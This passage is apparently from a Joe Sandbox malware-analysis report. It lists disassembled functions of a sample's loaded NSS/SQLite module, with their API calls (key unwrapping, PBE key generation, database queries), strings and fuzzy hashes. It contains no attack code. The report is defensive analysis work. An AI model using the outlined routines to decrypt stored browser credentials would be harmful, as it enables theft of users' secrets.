                                                                                                                                                                                                                            Function 6CB53D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CB53DFB
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB53EEC
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB53FA3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB54047
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB540DE
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB5415F
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB5416B
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB54288
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB542AB
                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 6CB542B7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                            • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                            • API String ID: 703928654-3678606288
                                                                                                                                                                                                                            • Opcode ID: 7110ac84c3236c72e825f8e2fafa1665128f34a2da662d606f14b90a8c73c6d8
                                                                                                                                                                                                                            • Instruction ID: 4f60c76c24c06ab3407d52244c0ada8fbb753e29683cb7721c7d4ffbbfa0956d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7110ac84c3236c72e825f8e2fafa1665128f34a2da662d606f14b90a8c73c6d8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F12171A087809FD715CF38C880A6BB7FAEF89304F648A2DF48597751E735D8A58B42
                                                                                                                                                                                                                            Function 6CB01C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB01D58
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB01EFD
                                                                                                                                                                                                                            • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CB01FB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CB01F83
                                                                                                                                                                                                                            • sqlite_temp_master, xrefs: 6CB01C5C
                                                                                                                                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 6CB020CA
                                                                                                                                                                                                                            • no more rows available, xrefs: 6CB02264
                                                                                                                                                                                                                            • unknown error, xrefs: 6CB02291
                                                                                                                                                                                                                            • abort due to ROLLBACK, xrefs: 6CB02223
                                                                                                                                                                                                                            • another row available, xrefs: 6CB02287
                                                                                                                                                                                                                            • table, xrefs: 6CB01C8B
                                                                                                                                                                                                                            • sqlite_master, xrefs: 6CB01C61
                                                                                                                                                                                                                            • unsupported file format, xrefs: 6CB02188
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                            • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                            • API String ID: 563213449-2102270813
                                                                                                                                                                                                                            • Opcode ID: 84bce7c1c365b2c96c3212e8b220db233e354c0d8b38b84e550ea867f83dc2fa
                                                                                                                                                                                                                            • Instruction ID: 1804963e3cb44017f88dfc70b8e085dd2b48090d6bbcaf4f69fd22f20ea60830
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84bce7c1c365b2c96c3212e8b220db233e354c0d8b38b84e550ea867f83dc2fa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1127C707083818FD715CF19C49465ABBE2FF89318F18855DE9998BB52D731E84ACB83
                                                                                                                                                                                                                            Function 6CB8FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CB8FD06
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CB8F696
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CB8F789
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CB8F796
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CB8F79F
                                                                                                                                                                                                                              • Part of subcall function 6CB8F670: SECITEM_DupItem_Util.NSS3 ref: 6CB8F7F0
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PK11_GetAllTokens.NSS3 ref: 6CBB3481
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PR_SetError.NSS3(00000000,00000000), ref: 6CBB34A3
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: TlsGetValue.KERNEL32 ref: 6CBB352E
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: EnterCriticalSection.KERNEL32(?), ref: 6CBB3542
                                                                                                                                                                                                                              • Part of subcall function 6CBB3440: PR_Unlock.NSS3(?), ref: 6CBB355B
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CB8FDAD
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB69003,?), ref: 6CBBFD91
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(A4686CBC,?), ref: 6CBBFDA2
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBC,?,?), ref: 6CBBFDC4
                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CB8FE00
                                                                                                                                                                                                                              • Part of subcall function 6CBBFD80: free.MOZGLUE(00000000,?,?), ref: 6CBBFDD1
                                                                                                                                                                                                                              • Part of subcall function 6CBAE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBAE5A0
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB8FEBB
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CB8FEC8
                                                                                                                                                                                                                            • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CB8FED3
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FF0C
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FF23
                                                                                                                                                                                                                            • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CB8FF4D
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB8FFDA
                                                                                                                                                                                                                            • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CB90007
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CB90029
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB90044
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 138705723-0
                                                                                                                                                                                                                            • Opcode ID: bb1ee2e66c707fe9e1f794bd2a627609a826ff1199ab3b91f03077bf83009717
                                                                                                                                                                                                                            • Instruction ID: accc922fa796cb208fe23dc753ef0f8affb1985b27578be0df969383e946783e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb1ee2e66c707fe9e1f794bd2a627609a826ff1199ab3b91f03077bf83009717
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B1C6716053419FE704CF29C840A6BF7E5FF88308F558A2DE99997A41E770E944CB62
                                                                                                                                                                                                                            Function 6CB87D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CB87DDC
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
                                                                                                                                                                                                                              • Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB87DF3
                                                                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CB87F07
                                                                                                                                                                                                                            • PK11_GetPadMechanism.NSS3(00000000), ref: 6CB87F57
                                                                                                                                                                                                                            • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CB87F98
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6CB87FC9
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB87FDE
                                                                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CB88000
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CB87F0C,?,00000000,00000000,00000000,?), ref: 6CBA943B
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CBA946B
                                                                                                                                                                                                                              • Part of subcall function 6CBA9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CBA9546
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB88110
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CB8811D
                                                                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB8822D
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB8823C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1923011919-0
                                                                                                                                                                                                                            • Opcode ID: 2fbb163a5415052227b43544ea058c5c31641b9364a2dce081b7e3b650ef09b7
                                                                                                                                                                                                                            • Instruction ID: 4e0bd2b8268ec47b8e8744cd8daa6d5de331ffbc199b5c588912be9b49e76d07
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fbb163a5415052227b43544ea058c5c31641b9364a2dce081b7e3b650ef09b7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6C16DB1D412999BEB21CF54CC40BEEB7B9EB05308F0481E5E81DB6641E7719E85CFA1
                                                                                                                                                                                                                            Function 6CBB1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CBB1F19
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CBB2166
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CBB228F
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CBB23B8
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB241C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy$Error
                                                                                                                                                                                                                            • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                            • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                            • Opcode ID: 1c7bfd54c394ac23e081eb935dbc9356668abf1a07a5353594e878f0511e3fdd
                                                                                                                                                                                                                            • Instruction ID: 948756ee480661fa8f84b65003973eab5debac0eb1c95684e8771549a1388c9e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7bfd54c394ac23e081eb935dbc9356668abf1a07a5353594e878f0511e3fdd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8020162D0CBC86EFB328671C44D3E76AE4DB45328F0C166EC5DE56683CBB899498353
                                                                                                                                                                                                                            Function 6CBB6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C60
                                                                                                                                                                                                                            • PR_ExplodeTime.NSS3(00000000,6CB61C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C94
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                            • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                            • API String ID: 3534712800-180463219
                                                                                                                                                                                                                            • Opcode ID: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
                                                                                                                                                                                                                            • Instruction ID: 69b73ebab00574968427062cf9af40ba17964497f0deb49786e80c1d87512304
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54513B72B015494FC70CCDADDC526EEB7DAABA4310F48C23AE442DB785DA38E906C751
                                                                                                                                                                                                                            Function 6CBCBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CBCBD48
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CBCBD68
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CBCBD83
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CBCBD9E
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CBCBDB9
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CBCBDD0
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CBCBDEA
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CBCBE04
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CBCBE1E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AlgorithmPolicy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2721248240-0
                                                                                                                                                                                                                            • Opcode ID: 1834e01b0c00b3a446d7036db4f6826558b88e6888e327c97d46983a42ed381a
                                                                                                                                                                                                                            • Instruction ID: 6dcfd36ce45695598a057dfccc5babcdc0926ffc12c42908613523bd0b09eb11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1834e01b0c00b3a446d7036db4f6826558b88e6888e327c97d46983a42ed381a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC2182F7F042DA57FB004A5AAC43F8F7278DB91B4DF080528F916EE641F750941886A7
                                                                                                                                                                                                                            Function 6CC39D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CAF8637,?,?), ref: 6CC39E88
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CAF8637), ref: 6CC39ED6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CC39ECA
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC39EC0
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CC39ECF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                                                                            • Opcode ID: 472ed4c097eea2b4d19ef3fac717cb7ee99efd63763757f78863b8a7b296b8b7
                                                                                                                                                                                                                            • Instruction ID: d5c19b1371650846425bc8efa797a5ba20ea137f95482ccca8d775944d8b8da2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 472ed4c097eea2b4d19ef3fac717cb7ee99efd63763757f78863b8a7b296b8b7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69819271B012258FCB04CFAAD880ADEB3F6EF48304B159569E81AAB741FB31ED45CB50
                                                                                                                                                                                                                            Function 6CC7CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC7D086
                                                                                                                                                                                                                            • PR_Malloc.NSS3(00000001), ref: 6CC7D0B9
                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6CC7D138
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
